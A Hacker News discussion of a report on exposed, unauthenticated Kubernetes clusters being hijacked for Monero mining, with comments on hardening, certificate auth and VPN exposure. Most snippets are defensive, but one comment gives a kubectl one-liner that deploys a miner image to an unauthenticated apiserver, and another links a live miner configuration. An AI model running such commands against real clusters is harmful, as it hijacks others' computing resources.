Kubernetes clusters being hijacked to mine cryptocurrencies (binaryedge.io)
183 points by igama on Dec 6, 2018 | 64 comments



Ugh. I mean, I recently got into an argument about whether anything but a hard firewall could or should be exposed on a WAN interface to the internet, and we kinda agreed to disagree for now.

But popular services, on default ports, with default APIs enabled, without hard authentication, on a WAN interface? That should be a paddling. That doesn't fly. Or, well, it does, except not for the guy paying the power bill.


To be fair, kubernetes itself and most distributions are quite secure by default. So with kubernetes it's not the same situation as with the NoSQL databases that had no authentication and were bound to the internet.

I'm not familiar with enough distributions to know if there is a popular distribution that totally disables authentication by default, but in my company's distribution, in kubeadm clusters, and I suspect in all managed clusters (GKE/EKS/AKS/etc), the vector outlined in the article would only work if an admin specifically disabled authentication.

In Gravity (my company's distribution), we even disable anonymous-auth, so someone would have to do real work to allow API access to the internet.
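For anyone wanting to check their own cluster, this is roughly what that hardening looks like (a sketch; where the flag lives varies by distribution):

    # apiserver: refuse requests that present no credentials at all
    kube-apiserver --anonymous-auth=false ...

    # the kubelet has the same flag for its own API (port 10250)
    kubelet --anonymous-auth=false ...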


Indeed modern versions of Kubernetes are fairly good for network security against unauthenticated attackers.

That said, it's not that long ago that a lot of distros were shipping unauthenticated kubelets, and I think that's where a lot of this will come from.

From cluster reviews I've done, problems like this tend to arise where people are using older versions (so early adopters) or have hand-rolled their clusters, not realising all the areas that require hardening.
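If you want to audit for the unauthenticated-kubelet case, it's a one-liner (hostname hypothetical):

    # an open kubelet will answer this with every pod spec on the node
    curl -sk https://node1.example.com:10250/pods

    # older setups also exposed a read-only port with no TLS at all
    curl -s http://node1.example.com:10255/pods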


How do you provide your initial credentials, though? Providing decently secure default initial credentials is possible, but tricky.

And that's where I'll turn around 180 degrees and say: If you can't give me a hard reason why you'll be a hard target on the internet, you shouldn't have a public address. Default authentication isn't enough.

I dislike trusting my edge firewall, but it gives me time to handle weak internal systems.


Kubernetes only accepts very limited forms of auth by default.

Typically, it's limited to client certificates that have been signed by the private key the apiserver has access to.

Client cert auth over TLS is pretty damn secure. I expose my kubernetes cluster's apiserver to the internet and have, to my knowledge, had no issues yet.
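For context, "very limited forms of auth" boils down to something like this (paths hypothetical):

    # apiserver side: trust only client certs signed by this CA
    kube-apiserver --client-ca-file=/etc/kubernetes/pki/ca.crt ...

    # client side: present a cert/key pair signed by that CA
    kubectl config set-credentials alice \
      --client-certificate=alice.crt --client-key=alice.key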


Client cert auth is quite good against unauthenticated attacks but has its downsides.

At the moment Kubernetes has no certificate revocation process at all, so if one of your users has their cert stolen for an Internet-facing cluster, you'll have to rebuild the entire CA and re-issue all certs to get round the problem.
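To make that concrete: the apiserver checks only the signature (there's no CRL or OCSP check), so anything the CA has ever signed stays valid until it expires. Roughly, with openssl (filenames hypothetical):

    # the CN becomes the Kubernetes username, O the group
    openssl genrsa -out alice.key 2048
    openssl req -new -key alice.key -subj "/CN=alice/O=devs" -out alice.csr
    openssl x509 -req -in alice.csr -CA ca.crt -CAkey ca.key \
      -CAcreateserial -days 365 -out alice.crt
    # a stolen alice.crt now works for the full 365 days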


Yeah, client certs are a good, hard reason. In fact, now that I think of it, the services we expose to the internet all deploy mutual TLS authentication.
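For a plain web service the same pattern is only a few lines in e.g. nginx (paths hypothetical):

    server {
        listen 443 ssl;
        ssl_certificate        /etc/nginx/tls/server.crt;
        ssl_certificate_key    /etc/nginx/tls/server.key;
        # mutual TLS: require a client cert signed by our CA
        ssl_client_certificate /etc/nginx/tls/clients-ca.crt;
        ssl_verify_client      on;
    }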


I strongly suspect we're going to encounter quite a few instances of admins (or individual developers, depending on how poorly-secured a given corporate network is) installing Kubernetes to test and play with, disabling auth for simplicity of testing, and then completely forgetting they have it installed or failing to properly shut it down and uninstall it.

They may consider that fine for security (the equivalent of having an insecure MySQL install on a machine with no tables of value in it), but might perhaps forget that even an empty Kubernetes install still lets attackers dictate what your CPU is doing.
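And "dictate what your CPU is doing" is not an abstraction; against an unauthenticated apiserver it's one command (server and image names made up):

    kubectl --server=https://victim.example.com:6443 \
      --insecure-skip-tls-verify=true \
      run miner --image=evil/miner:latest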


You will have to patch a critical vulnerability every year on production systems, no matter what language or who develops it.

Secure defaults are irrelevant if you pay attention to the news.


> You will have to patch a critical vulnerability every year on production systems, no matter what language or who develops it.

Interesting. I've got a few OpenBSD boxes that aren't impacted by vulnerabilities nearly so often.

It turns out that if you practice defence in depth, the majority of security vulnerabilities in the news have no impact on you.

For example, on my openbsd boxes I have only a single user. I do not run any untrusted code. That means spectre/meltdown doesn't actually impact me because no one can run code which will perform such a timing attack.

There was a recent openbsd/Xorg security issue. I didn't have X installed, and even if I did since it's only a single-user server, it again wouldn't have impacted me (privilege escalation means nothing when everyone is effectively root in my threat model).

All vulnerabilities are not created equal, and with enough good practices it's possible to have boxes that are secure for years and years with no need for patches.


Yep. The bloated, overhyped, and churny mainstream crap needs updating all the time (and it kinda tends to break, too). Build on that, and hope the updates get done before someone fires an exploit. That's defense in "pray and hope we're faster."

I'm not so concerned about my OpenBSD box with >800 days of uptime, which runs very limited and carefully selected services.


On this point, it's worth noting that the Kubernetes support lifecycle is currently 9 months, so you indeed need to plan not only for bugfixes but for a full upgrade, fairly regularly.
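On kubeadm-based clusters, at least, checking where you stand is cheap (a sketch):

    kubectl version --short    # what you're running now
    kubeadm upgrade plan       # what you're expected to move to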


To be fair, you're playing with fire if you rely on product security to be perfect. For every SSHd out there, there are multiple SystemD or worse security products.


I think you meant "OpenSSH", not SSHd, and "systemd" is always spelled lowercase. The 'd' doesn't officially stand for anything and is never capitalized.

"sshd" is an ambiguous term as there are many ssh daemons, from the libssh server to dropbear to OpenSSH, and OpenSSH is likely the one that you use and the most secure one.

systemd has had a few security incidents, but very few of them are actually a big deal. People have overblown each and every one since a cult of systemd hate has emerged, which has muddied the waters significantly.

> you're playing with fire if you rely on product security to be perfect

That's a vacuous statement; of course you can't rely on everything being perfect, so you must practice defence in depth. Everyone already knows software sometimes has bugs.

The point of the parent post is that Kubernetes does intend to allow secure use while being exposed publicly (unlike e.g. the default redis configuration). The parent post does not claim it is perfect and that you must never patch it, merely that it is reasonable and can be hardened.

In the end, there are tradeoffs. You must decide that the convenience of developers being able to ssh into machines is worth the risk of running OpenSSH. You must decide that using Google Apps is worth the risk that Google will have a data breach exposing all of your confidential information. You must decide that Slack can be trusted to write secure enough php that your messages aren't being read by others.

Just because something isn't perfect doesn't mean that it can't still be a good tradeoff based on the expected risk.


> "systemd" is always spelled lowercase. The 'd' doesn't stand for something and is never capitalized.

I thought the 'd' was a holdover from "daemon", as in initd or setsid, as a general name for a background process. systemd is a little more than just a background process but it's sort of the same idea.

From the wiki page: "In a strictly technical sense, a Unix-like system process is a daemon when its parent process terminates and the daemon is assigned the init process (process number 1) as its parent process and has no controlling terminal. However, more generally a daemon may be any background process, whether a child of the init process or not. "

https://en.wikipedia.org/wiki/Daemon_(computing)


From their documentation [0]:

> Yes, it is written systemd, not system D or System D, or even SystemD .... [You may also, optionally] call it (but never spell it!) System Five Hundred since D is the roman numeral for 500 (this also clarifies the relation to System V, right?).

The 'd' is a pun on both daemons typically being postfixed with 'd' and on the roman numeral for '500'. It does not directly stand for either though officially.

[0]: https://www.freedesktop.org/wiki/Software/systemd/


While the naming trivia is interesting, it is a fact that systemd has had its fair share of security problems. And while it is a fact that OpenSSH is more mature, systemd has some issues with recognizing security failures as such: https://www.reddit.com/r/linux/comments/6mykng/that_systemd_...


That is a perfect example of security FUD around systemd.

The attack vector is what? Someone manages to convince an administrator to write a service that has "User=0foo" in it?

If an attacker has access to write into `/etc/systemd/system` then they already have root on the system.

If an attacker can cause an administrator to write a systemd unit and the administrator isn't checking that it's reasonable, the attacker could just have the `ExecStart` line run a 'sploit and not have a `User` line at all.

Seriously, what is the attack that you imagine where this has a security impact?

As Poettering said on that issue, no one should be running system services as usernames starting with numbers, and such usernames are of questionable validity in the first place.

People still have blown it out of proportion because it's systemd.

Note that a similar issue exists in the old sys-v init scripts: they run as root, and if you convince the person writing a sys-v init script to omit the `start-stop-daemon -u username` flag, the daemon will run as root. Basically identical, but it was never assigned a CVE, because no one seriously considers "I talked my sysadmin into running something as root" a privilege escalation by itself.
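For anyone who hasn't read the issue, the whole thing boils down to a unit like this (paths hypothetical):

    [Service]
    # "0foo" is not a valid username by systemd's rules, so the User=
    # line is rejected and the service runs as the default user: root
    User=0foo
    ExecStart=/opt/app/server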


Yes, I meant OpenSSH


Got in a pretty heated debate with a colleague once about this. We had a really great infrastructure setup with a VPN bastion host that would get you into our VPC. You couldn't reach any of our kube nodes externally. Your Google account was your VPN account. It was pretty solid.

When this engineer redid things, they opted to go the public internet route, where the master runs a public API and auth is done via a certificate. The logic was that external 3rd-party stuff (CI) should be able to control our master.

To my knowledge this setup is still running and chances are these machines are vulnerable to this issue.

Contrast that to the prior setup where, immediately upon being offboarded from the company, your VPN access was automatically terminated (thank you LDAP and Foxpass!).


I can't imagine a good reason to expose ANY of my services to the public internet, aside from the REST API that drives our application, where that is the feature, of course.

With software like Google IAP, and many similar products, it just seems silly.


May I recommend reading up on beyondcorp [0]?

Google has moved its internal stuff to the beyondcorp model, and it honestly seems like a better approach if you really care about security and have a big enough security team to make it work.

[0]: https://www.beyondcorp.com/


Beyondcorp is a great model IF you can afford to manage it correctly.

Google have a) huge resources and b) a threat model which means they're subject to a lot of high-end attacks all the time.

For many corps, the idea of exposing all their services and endpoints to the general internet without firewalls or VPNs would ... end poorly...


Thank you for the suggestion! :)

Google I(dentity)A(ware)P(roxy) is actually a hosted beyondcorp implementation! But I probably should have explained that in my original comment.


No, a Kube cluster with client certificate authentication enabled is not going to be vulnerable to the specific issue discussed in OP's blog post: those are Kube clusters exposed publicly with no authentication whatsoever.

I generally think it's no more risky to expose a Go app with cert-based auth than it is to expose OpenVPN so long as both are set up correctly.


Actually, the CVE mentioned at the top of the blog could be exploited over the API server port in quite a few default configurations (hence the CVSS 9.8 score).

Many Kubernetes distributions enable anonymous authentication to allow for health checking, so there is some risk there.

As to the general point, the only thing I'd say is that Kubernetes is a massive 1.5-million-line code base of relatively new code, whereas OpenVPN has been around and been attacked for a long time. I wouldn't be surprised if the recent CVE turns out not to be the only issue we see in k8s over the next year.
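The health-check case is easy to test against your own endpoint, by the way (hostname hypothetical); in many setups this returns "ok" with no credentials at all:

    curl -k https://apiserver.example.com:6443/healthz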


Why is a web server's demand for a certificate different from a VPN server's demand for a certificate?


Complexity and publicity.

Complexity: Single-purpose apps built with a very specific threat model in mind, for a boring, established use case, tend to be more secure. K8s is a fast-evolving labyrinth of complexity with contributions from thousands of people, very few of whom have a grasp on the whole codebase.

Publicity: the general Internet doesn't find your VPN server just by using your API.


The VPN server offers frivolous features like session tracking and certificate revocation. Things k8s continues to punt down the road or outright ignore.


Because VPNs are magic that never has a backdoor for a decade.


> The logic here was so that external 3rd party stuff (CI) could control our master

Why not sidestep the issue by running CI within the VPC? :/


Ugh, going from bastion host hopping to publicly addressable would be a nightmare. Please tell me the database doesn't have a publicly addressable IP and hostname.


Bah, I hope they at the very least have firewall whitelist rules to limit API access to your CI vendor's ranges.
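Even something this crude would narrow the exposure considerably (CIDR made up; your CI vendor publishes its real ranges):

    # allow the CI vendor's ranges to reach the apiserver, drop everyone else
    iptables -A INPUT -p tcp --dport 6443 -s 203.0.113.0/24 -j ACCEPT
    iptables -A INPUT -p tcp --dport 6443 -j DROP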


At the risk of stating the obvious: using a VPN would not really protect you from this vulnerability, though it would mitigate your exposure (a lot or a little, depending on your setup and threat model).

edit: to clarify, a vpn/vpc requirement would turn CVE-2018-1002105 from a pre-auth into a post-auth vulnerability, right? Which might be a big or small help depending on how controlled your user pool and signup process is.


At least cryptocurrency has removed most of the creativity from script kiddies - there are so many more interesting things you could do than just mine coins.


Yeah, exactly. It’s almost like a bounty for finding a vuln. It seems to be a mostly harmless attack that doesn’t cause global internet grief like a DDoS or something.


WannaCry’s very public global ransom brought attention to a Monero mining botnet which had been using the same exploit for weeks beforehand, making $40,000 per day. It made much more than WannaCry, and its operators are still unknown and would have been able to cash out.

Script kiddies are just annoying, and their actions resulted in the patch killing that silent mining botnet as well.


This is one of the side-effects of products having enormous hype in this industry.

Far too many people are adopting Docker/Kubernetes as they have been the hot new product for the last couple of years, often regardless of whether they are actually the best or most appropriate tool for the job.

A lot of the people who get sucked into the hype are often inexperienced programmers, devops or admin types who are in positions of power or influence in companies that they probably shouldn't be, IMHO.

As a result, they don't have the Linux or networking experience to know whether they are deploying these complex products securely, and they are putting their employers' businesses at risk.


I disagree that hype leads to the problem you describe. Kubernetes is good at its job, and therefore it's popular, and therefore it's used by people who may not understand it.

You could say the exact same thing about Linux, Cisco, Dell, or pretty much any of the popular FOSS projects. Popular things, regardless of their complexity, get chosen by people of all experience levels. Inexperienced people are less likely to properly configure something, regardless of its popularity or hype.

If anything, having a few attractive projects tends to be beneficial (or at least neutral) for security as there are so many more people scrutinizing it, and many more people learning how to properly use it.


>A lot of the people who get sucked into the hype are often inexperienced programmers, devops or admin types who are in positions of power or influence in companies that they probably shouldn't be, IMHO.

I cannot agree more. Many times, I feel you can easily get by with ansible and terraform to set up VMs / docker; you don't quite need k8s. Just because k8s is cool, people feel the need to use it.


It's more complicated than that. Whilst some people are probably jumping on kubernetes for the hype, there's a lot of things it makes really easy, especially for less experienced teams.

For example:

- You want to spin up ephemeral environments to test PRs end to end? Sure, create a namespace, deploy your charts, and run your tests (see the sketch after this list). You could do that with ansible too, but it's harder.

- Your org is running apps via a multi-cloud and on-prem strategy? Okay, let's just write lots of tooling per cloud and another set for on-prem, or we could abstract that away via kubernetes and only worry about tooling for kube itself.

- You want rolling upgrades? Sure, build them with ansible then, or you could just use kube.
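To the first point, the entire ephemeral-environment flow is a handful of commands (release/chart names hypothetical, helm 2 syntax):

    kubectl create namespace pr-123
    helm install ./charts/myapp --name myapp-pr-123 --namespace pr-123
    # ...run the end-to-end tests against the namespace...
    kubectl delete namespace pr-123    # tears down everything in it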

Further to that, kubernetes is guiding reasonable abstractions, separating infrastructure from code. Sure, it comes with complexity, but so do most things once you start throwing in scaling and auto-recovery.

For example, deploy terraform from your laptop? The device you probably browse porn on becomes an attack surface. Move this to Jenkins? The CI is the attack surface. Put your code on Bitbucket? Bitbucket and the Jenkinsfile become the attack surface. Pretty much everything we do has complexity and attack surface _problems_, and using a managed k8s service will allow you some easy wins so you can actually think about those other problems, and those solutions will work on all platforms you can run k8s on.


Can I ask because I'm genuinely interested - what on earth do you do for third-party applications (e.g. closed source) that have to be integrated into your environment and don't come pre-packaged in a convenient container?

Do you containerize these yourselves, whether or not the vendor says they will support that? Or does it get pushed to some other team that manages whole VMs/AWS instances that are not container hosts?

Or is this a scenario that just doesn't happen in your environment?

Genuinely curious.

Also:

> using a managed k8s service will allow you some easy wins so you can actually think about those other problems, and those solutions will work on all platforms you can run k8s on

None of which matters one jot, if one cannot properly manage ingress/egress filtering on one's API endpoints, or a reasonable level of password/credential security. One will be used for cryptomining or worse, as per the fine article.

In that instance, one needs to go back and get some basic UNIX/Linux/network and security training before one starts playing with complicated software on publicly connected clouds. Or hire some people who actually know what they are doing with respect to that.


> Can I ask because I'm genuinely interested - what on earth do you do for third-party applications (e.g. closed source) that have to be integrated into your environment and don't come pre-packaged in a convenient container?

Depends what it is. I've taken a number of apps and wrapped them into docker containers and then written a helm chart. Some orgs get a bit skittish over "vendor support" but this usually only matters when they think it's a key product.

The point is, once you have a fleet, you should manage everything the same. If you're off building other pet services, you're going to have capacity problems.

> None of which matters one jot, if one cannot properly manage ingress/egress filtering on one's API endpoints, or a reasonable level of password/credential security. One will be used for cryptomining or worse, as per the fine article.

I mean sure, but I did say use a managed service, which will come with auth. Similarly, I wouldn't recommend hosting services on any cloud or public-facing network without a professional involved.

For example, AWS is easy to get wrong all the same. One of my current clients is busy hiring developers with no experience to put services on AWS, and they came up with no encryption, no auth, no monitoring, and misconfigured IAM. What's really the difference between that and kube?


> Do you containerize these yourselves, whether or not the vendor says they will support that? Or does it get pushed to some other team that manages whole VMs/AWS instances that are not container hosts?

Working with large enterprises, I've seen both. If there's a good business case for the risk vs. reward (i.e. containers providing something technically useful which can be translated directly into revenue) and a good engineering + management team, some companies will actually risk it.

There's also the factor of how good the company's relationship with the third-party vendor is. Some companies have the weight to make the vendor support the unsupportable.


I dunno, any cluster with more than 5 servers is a pain to deal with without something like kubernetes.


Note that k8s is designed to control a lot of machines, sometimes the entire fleet of an SMB.

So it should be treated as more sensitive than other infrastructure pieces.

And I think the OP meant to say that, not that k8s is particularly bad at security in general, or that the k8s team is less experienced in security.

The downvote is not warranted.


The "hype" part is pretty subjective and may have warranted down votes.

It's not hype if it solves a lot of organizations pain points.


Let's be honest, pretty much every new tech got hyped initially.

K8s is no doubt hyped; otherwise it wouldn't enjoy such explosive growth.

That's not subjective, at least IMHO.


It's the delineation between 'hype' and 'excitement' that is tricky.

If magic CPUs that were 10x better showed up tomorrow we'd all be justified in being very excited. But running with hype around the next Zune? ... that's not excitement backed with meaning.


Then we should agree to disagree.


Why do you assume that other platforms are not at similar risk?

VMs also have zero-days that have been exploited for cryptomining.


I don't assume that at all. I mentioned Docker explicitly and people are pulling Docker containers from untrusted sources with malware pre-installed, because they lack the experience that would tell them that pulling untrusted Docker containers and running them is a bad idea.

https://threatpost.com/malicious-docker-containers-earn-cryp...

From the article itself, although they mention the CVE at the top, the real point they are making is that people are deploying the products with poor defaults:

"as is typical with our findings, lots of companies are exposing their Kubernetes API with no authentication; inside the Kubernetes cluster"

Not to mention a bunch of NoSQL type db's you can easily search on Shodan if you wanted to have some fun.

So yes - the problem here is experience, or lack thereof, and not Kubernetes itself. The CVE can be patched. You can't patch inexperience - except with experience I suppose.

All I am saying is that there a lot of people who are downloading and deploying these products because of hype, who are unable or unwilling to secure them.


Leaving aside NoSQL db's - there's also a ton of normal SQL databases wide open; I don't think hype is necessarily the issue there.


Sure, maybe your average garden variety Postgres or MySQL instances, and probably some MS-SQL as well. Companies that have a large investment in commercial RDBMS (eg. Oracle, DB2, etc) tend not to be so careless in my experience.


CEO of BinaryEdge here, you're 100% right. If I showed you the queue of posts we have, you'd see similar posts to this one, just with different technologies that we have seen being infected or misused (etcd, docker, and about 10 or 20 more types of DBs).


CTO of BinaryEdge here. For those wondering, we have detected more than 15k Kubernetes APIs with auth. This post focuses on the ~1.5k found without auth, which are fully open.

It's not just a Kubernetes problem. Like many have posted, many databases, other types of clusters, and shares are accessible without auth to those who know how to look for them (not that hard nowadays), mainly malicious actors.


JSON file is still available (http://192.99.142.232:8220/222.json)


> "algo": "cryptonight",

Nice, Monero mining

Cryptocurrency makes the bug bounty market A LOT more efficient than companies, legislation, or HackerOne ever could.


Heading continued: “... thieves make off with $4.50”


Is anyone else a little tired of "X used to mine crypto" stories?

Yes - if it has a CPU and access to the public internet, someone will hack it and make it mine "crypto". Let's stop pretending we aren't aware that the internet of things exists and writing breathless stories every time a toaster, router, or adult toy starts churning out Monero.


This is an important vulnerability in widely-used software. Crypto is relevant because the inherent design of crypto makes hacks like this more profitable, but it's not the main thing about the article.


Exactly, the main story is Kubernetes being exploited in the wild and in large numbers; crypto mining is just one of the "attacks" taking place.


Is kubernetes the mongodb of orchestrators?


These guys are amazing. They have a lot of data and an excellent app with a lot of potential!



